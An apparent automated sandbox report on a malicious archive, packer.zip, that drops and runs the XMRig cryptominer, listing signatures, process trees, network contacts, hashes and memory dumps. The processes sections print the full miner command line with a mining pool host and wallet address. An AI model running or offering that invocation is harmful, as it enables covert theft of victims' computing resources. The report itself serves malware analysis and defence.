Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-20 15:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:11
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2712 wrote to memory of 2024 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2712 wrote to memory of 2024 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4488,i,13035806169561352434,1332896185314862791,262144 --variations-seed-version --mojo-platform-channel-handle=3812 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13035806169561352434,1332896185314862791,262144 --variations-seed-version --mojo-platform-channel-handle=4168 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.177.190.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2024-16-0x0000024769B80000-0x0000024769BA0000-memory.dmp
memory/2024-17-0x0000024769EE0000-0x0000024769F00000-memory.dmp
memory/2024-18-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-19-0x0000024769F00000-0x0000024769F20000-memory.dmp
memory/2024-20-0x000002476B6E0000-0x000002476B700000-memory.dmp
memory/2024-21-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-22-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-23-0x0000024769F00000-0x0000024769F20000-memory.dmp
memory/2024-25-0x000002476B6E0000-0x000002476B700000-memory.dmp
memory/2024-24-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-26-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-27-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-28-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-29-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-30-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-31-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-32-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-33-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-34-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-35-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-36-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-37-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-38-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-39-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-40-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-41-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-42-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-43-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-44-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-45-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-46-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-47-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-48-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-49-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-50-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-51-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-52-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-53-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-54-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-55-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-56-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-57-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-58-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-59-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-60-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-61-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-62-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-63-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-64-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-65-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-66-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-67-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-68-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-69-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-70-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-71-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-72-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-73-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-74-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-75-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-76-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-77-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-78-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-79-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-80-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-81-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-82-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-83-0x00007FF780D10000-0x00007FF781813000-memory.dmp
memory/2024-84-0x00007FF780D10000-0x00007FF781813000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:11
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4116 wrote to memory of 1580 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4116 wrote to memory of 1580 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.111.78.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1580-16-0x000001E0A88D0000-0x000001E0A88F0000-memory.dmp
memory/1580-17-0x000001E0A8920000-0x000001E0A8940000-memory.dmp
memory/1580-18-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-19-0x000001E0A8940000-0x000001E0A8960000-memory.dmp
memory/1580-20-0x000001E0A8960000-0x000001E0A8980000-memory.dmp
memory/1580-21-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-22-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-25-0x000001E0A8960000-0x000001E0A8980000-memory.dmp
memory/1580-24-0x000001E0A8940000-0x000001E0A8960000-memory.dmp
memory/1580-23-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-26-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-27-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-28-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-29-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-30-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-31-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-32-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-33-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-34-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-35-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-36-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-37-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-38-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-39-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-40-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-41-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-42-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-43-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-44-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-45-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-46-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-47-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-48-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-49-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-50-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-51-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-52-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-53-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-54-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-55-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-56-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-57-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-58-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-59-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-60-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-61-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-62-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-63-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-64-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-65-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-66-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-67-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-68-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-69-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-70-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-71-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-72-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-73-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-74-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-75-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-76-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-77-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-78-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-79-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-80-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-81-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-82-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-83-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
memory/1580-84-0x00007FF6BDF20000-0x00007FF6BEA23000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:11
Platform
win10v2004-20240508-en
Max time kernel
1796s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4812 wrote to memory of 4056 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4812 wrote to memory of 4056 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
